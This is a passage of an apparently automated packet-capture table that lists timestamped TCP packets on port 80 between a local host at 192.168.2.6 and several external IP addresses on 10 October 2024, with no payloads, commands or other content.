                                                                                                                                            Oct 10, 2024 12:52:00.340821981 CEST6139180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:52:00.344592094 CEST6139180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:52:00.349462032 CEST80613913.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:05.764203072 CEST6139280192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:05.769165039 CEST806139238.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:05.769249916 CEST6139280192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:05.777771950 CEST6139280192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:05.782646894 CEST806139238.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:06.772964001 CEST806139238.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:06.773010015 CEST806139238.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:06.773065090 CEST6139280192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:07.287781954 CEST6139280192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:08.307975054 CEST6139380192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:08.312974930 CEST806139338.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:08.313189983 CEST6139380192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:08.321839094 CEST6139380192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:08.326777935 CEST806139338.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:09.228620052 CEST806139338.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:09.228802919 CEST806139338.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:09.228880882 CEST6139380192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:09.834443092 CEST6139380192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:10.856362104 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:10.863049984 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:10.863181114 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:10.888828993 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:10.894865990 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:10.894993067 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.398072958 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:12.574728012 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.574764967 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.574830055 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.574867964 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:12.574904919 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:12.574976921 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:12.575378895 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.575448036 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:12.576731920 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.576798916 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:12.578692913 CEST806139438.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:12.578758001 CEST6139480192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:13.416693926 CEST6139680192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:13.421613932 CEST806139638.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:13.421696901 CEST6139680192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:13.429264069 CEST6139680192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:13.435606956 CEST806139638.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:14.355374098 CEST806139638.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:14.355850935 CEST806139638.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:14.355915070 CEST6139680192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:14.358855963 CEST6139680192.168.2.638.47.233.65
                                                                                                                                            Oct 10, 2024 12:52:14.364538908 CEST806139638.47.233.65192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:19.394831896 CEST6139880192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:19.399682045 CEST8061398188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:19.399784088 CEST6139880192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:19.413363934 CEST6139880192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:19.418474913 CEST8061398188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:19.875600100 CEST8061398188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:19.876771927 CEST8061398188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:19.876918077 CEST6139880192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:20.928261042 CEST6139880192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:21.947833061 CEST6139980192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:21.952800035 CEST8061399188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:21.953142881 CEST6139980192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:21.962016106 CEST6139980192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:21.967175007 CEST8061399188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:22.411324024 CEST8061399188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:22.412621021 CEST8061399188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:22.412678957 CEST6139980192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:23.504369974 CEST6139980192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:24.511380911 CEST6140080192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:24.516446114 CEST8061400188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:24.516542912 CEST6140080192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:24.530751944 CEST6140080192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:24.535631895 CEST8061400188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:24.535795927 CEST8061400188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:24.993253946 CEST8061400188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:24.994462013 CEST8061400188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:24.994533062 CEST6140080192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:26.041408062 CEST6140080192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:27.056170940 CEST6140180192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:27.061430931 CEST8061401188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:27.061517954 CEST6140180192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:27.070091009 CEST6140180192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:27.075258970 CEST8061401188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:27.706882000 CEST8061401188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:27.707665920 CEST8061401188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:27.709824085 CEST6140180192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:27.713608980 CEST6140180192.168.2.6188.114.97.3
                                                                                                                                            Oct 10, 2024 12:52:27.718429089 CEST8061401188.114.97.3192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:33.125092983 CEST6140280192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:33.130192041 CEST8061402197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:33.130287886 CEST6140280192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:33.153635979 CEST6140280192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:33.158606052 CEST8061402197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:34.662817955 CEST6140280192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:34.965286970 CEST8061402197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:34.965352058 CEST6140280192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:35.681711912 CEST6140380192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:35.686906099 CEST8061403197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:35.687043905 CEST6140380192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:35.695771933 CEST6140380192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:35.700709105 CEST8061403197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:37.209626913 CEST6140380192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:37.216048002 CEST8061403197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:37.217700958 CEST6140380192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:38.229449987 CEST6140480192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:38.234483957 CEST8061404197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:38.234646082 CEST6140480192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:38.303812027 CEST6140480192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:38.308784962 CEST8061404197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:38.308904886 CEST8061404197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:39.821641922 CEST6140480192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:39.827073097 CEST8061404197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:39.829706907 CEST6140480192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:40.845109940 CEST6140580192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:40.850166082 CEST8061405197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:40.850236893 CEST6140580192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:40.860795021 CEST6140580192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:40.865690947 CEST8061405197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:42.510890961 CEST8061405197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:42.510925055 CEST8061405197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:42.511059999 CEST6140580192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:42.514663935 CEST6140580192.168.2.6197.189.237.186
                                                                                                                                            Oct 10, 2024 12:52:42.519501925 CEST8061405197.189.237.186192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:47.626651049 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:47.631556988 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:47.631702900 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:47.640306950 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:47.645246983 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237704039 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237735987 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237760067 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237776041 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.237842083 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237864017 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237878084 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.237886906 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237907887 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237919092 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.237931013 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237951994 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.237965107 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.237974882 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.238003969 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.242927074 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.242950916 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.242974043 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.242986917 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.287470102 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.324382067 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.324428082 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.324444056 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.324459076 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.324462891 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.324475050 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.324495077 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.324775934 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.324815989 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.325016022 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325031996 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325047016 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325068951 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.325078964 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325093031 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325117111 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.325875044 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325916052 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.325930119 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325943947 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325961113 CEST806140767.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:48.325983047 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:48.325997114 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:49.146919012 CEST6140780192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.165149927 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.170181036 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.170483112 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.182602882 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.187480927 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784450054 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784501076 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784538984 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784545898 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.784573078 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784601927 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784614086 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.784640074 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784674883 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784694910 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.784707069 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784739971 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784742117 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.784768105 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.784804106 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.789858103 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.789892912 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.789911032 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.789926052 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.789947987 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.789969921 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.790071964 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.834383965 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.874836922 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874861002 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874892950 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874917984 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874922037 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.874933958 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874950886 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874965906 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.874969959 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.874980927 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.875022888 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.875022888 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.875822067 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.875837088 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.875850916 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.875890970 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.876194000 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.876209021 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.876224041 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.876238108 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.876238108 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.876264095 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.876739979 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.876780033 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:50.876782894 CEST806140867.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:50.876823902 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:51.694056034 CEST6140880192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:52.712836027 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:52.718044043 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:52.718122959 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:52.729840040 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:52.734806061 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:52.734873056 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309390068 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309426069 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309438944 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309449911 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309458971 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309475899 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309485912 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309497118 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309506893 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.309674978 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.309771061 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.313746929 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.314706087 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.314723969 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.314735889 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.314748049 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.314897060 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.314897060 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.396111965 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396130085 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396142960 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396238089 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396256924 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396269083 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396280050 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396291018 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396363974 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.396363974 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.396364927 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.396364927 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.396914959 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396934032 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396945000 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396955967 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.396966934 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.397083044 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.397083044 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:53.397751093 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.397763014 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.397775888 CEST806140967.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:53.398009062 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:54.240818024 CEST6140980192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.261704922 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.266794920 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.267030954 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.273695946 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.278546095 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875581026 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875597954 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875608921 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875619888 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875631094 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875643015 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875654936 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875667095 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875678062 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875775099 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.875893116 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.875894070 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.875894070 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.880820990 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.880872011 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.880882025 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.880893946 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.880961895 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.881094933 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.966223001 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966274023 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966310024 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966342926 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966377020 CEST806141067.223.117.189192.168.2.6
